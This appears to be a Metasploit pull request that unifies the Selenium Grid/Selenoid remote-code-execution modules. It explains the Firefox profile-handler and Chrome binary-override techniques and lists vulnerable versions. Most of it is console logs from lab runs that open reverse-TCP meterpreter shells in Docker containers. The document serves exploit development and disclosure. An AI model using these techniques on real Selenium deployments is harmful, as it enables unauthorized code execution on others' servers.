Unified Selenium Grid/Selenoid RCE with Firefox + Chrome auto-detection

[Chocapikk]

Hello Metasploit Team,

This PR replaces the two existing SeleniumGreed modules (selenium_greed_chrome_rce_cve_2022_28108 and selenium_greed_firefox_rce_cve_2022_28108) with a single unified module that auto-detects available browsers and picks the best attack vector.

Summary

Why a unified module? Both old modules target the same misconfiguration (unauthenticated WebDriver API) with different browser-specific payloads. There's no reason to maintain two separate modules for what is fundamentally the same exploit flow: enumerate browsers, create a session, execute code. The new module queries /status, identifies the backend (Grid vs Selenoid), enumerates available browsers, and auto-selects the best vector.

The CSRF framing was wrong. The original modules referenced CVE-2022-28108 (CSRF via non-JSON content types), but both modules sent application/json requests directly to the target. No CSRF involved, no victim browser needed. The actual attack is unauthenticated API abuse (CWE-306), which is what this module now correctly references.

The bash/sudo wrapper is gone. The old Firefox module wrapped the payload in a shell script that checked for passwordless sudo and piped through sudo su root -c /bin/bash. This is unreliable (assumes sudo exists and is passwordless) and unnecessary. The module now delivers payload.encoded directly via the data URI handler. Users who land as seluser can privesc themselves - the default Docker images ship with passwordless sudo, but that's post-exploitation, not the module's job. This makes the exploit more reliable across different environments.

Key changes:

• Merged Chrome + Firefox into selenium_greed_rce.rb with moved_from aliases for both old module paths so existing references keep working
• BROWSER option (auto/firefox/chrome) - Firefox preferred since it works on all Grid versions (never patched), Chrome binary override as fallback for Grid < 4.11.0 and all Selenoid versions
• Selenoid support - auto-detects Selenoid backends and adjusts API paths
• FileDropper for proper cleanup of FETCH payload artifacts
• FETCH_WRITABLE_DIR defaults to /tmp - the Firefox handler's cwd is / (not writable by seluser), so the FETCH payload needs a writable dir

Firefox profile handler - unpatched since 2021

The Firefox technique injects a custom profile with a handlers.json mapping application/sh to /bin/sh, then navigates to a data:application/sh URI to trigger execution. This was reported in SeleniumHQ/selenium#9526 in May 2021. The Selenium team responded with documentation improvements and optional basic auth. The actual handler injection was never fixed and works on all Grid versions including the latest (4.40.0 at time of writing).

Targets

1. Python In-Memory (default) - python/meterpreter/reverse_tcp via Chrome binary override
2. Unix/Linux Command Shell - cmd/linux/http/x64/meterpreter/reverse_tcp via fetch payload (both Chrome and Firefox)

Vulnerable versions

• Selenium Grid < 4.11.0 with Chrome nodes (binary override, patched via stereotype merge)
• Selenium Grid - all versions with Firefox nodes (profile handler, never patched)
• Selenoid - all versions with Chrome or Firefox (project archived December 2024)

Verification

Firefox (auto-detected) - selenium/standalone-firefox:4.40.0 on Ubuntu 24.04

msf6 > use exploit/linux/http/selenium_greed_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4480
LPORT => 4480
msf6 exploit(linux/http/selenium_greed_rce) > set TARGET 1
TARGET => 1
msf6 exploit(linux/http/selenium_greed_rce) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set FETCH_SRVPORT 9100
FETCH_SRVPORT => 9100
msf6 exploit(linux/http/selenium_greed_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4480
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid 4.40.0 with Firefox (all versions vulnerable to profile handler)
[*] Auto-selected Firefox (profile handler - works on all Grid versions)
[*] Creating Firefox session with malicious profile...
[*] Session created: 74d019ac-e7eb-4604-9c48-80baf43da5d9
[*] Navigating to data: URI to trigger handler...
[*] Sending stage (3090404 bytes) to 172.17.0.5
[+] Deleted /tmp/EUeiCPJfsLF
[*] Meterpreter session 1 opened (172.17.0.1:4480 -> 172.17.0.5:37004)

meterpreter > getuid
Server username: seluser
meterpreter > sysinfo
Computer     : 56a95484dc83
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Chrome (auto-detected) - selenium/standalone-chrome:4.10.0 on Ubuntu 24.04

msf6 > use exploit/linux/http/selenium_greed_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4481
LPORT => 4481
msf6 exploit(linux/http/selenium_greed_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4481
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid 4.10.0 with Chrome (vulnerable to binary override)
[*] Auto-selected Chrome (binary override)
[*] Sending Chrome session request with binary override...
[*] Sending stage (23404 bytes) to 172.17.0.7
[*] Meterpreter session 1 opened (172.17.0.1:4481 -> 172.17.0.7:50292)

meterpreter > getuid
Server username: seluser
meterpreter > sysinfo
Computer     : 90f5a4eefae5
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter  : python/linux

Selenoid 1.11.3 - selenoid/chrome:128.0 on Ubuntu 24.04

msf6 > use exploit/linux/http/selenium_greed_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4453
LPORT => 4453
msf6 exploit(linux/http/selenium_greed_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4453
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenoid 1.11.3 built at 2024-05-25_12:34:40PM (all versions vulnerable)
[*] Auto-selected Chrome (binary override)
[*] Sending Chrome session request with binary override...
[*] Sending stage (23408 bytes) to 172.17.0.10
[*] Meterpreter session 1 opened (172.17.0.1:4453 -> 172.17.0.10:42984)

meterpreter > getuid
Server username: selenium
meterpreter > sysinfo
Computer     : 669a719f93da
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter  : python/linux

[Chocapikk]

cc @Takahiro-Yoko - this unifies your Chrome and Firefox modules into a single module with auto-detection. Your original work is credited in the authors list and both old module paths are preserved via moved_from aliases.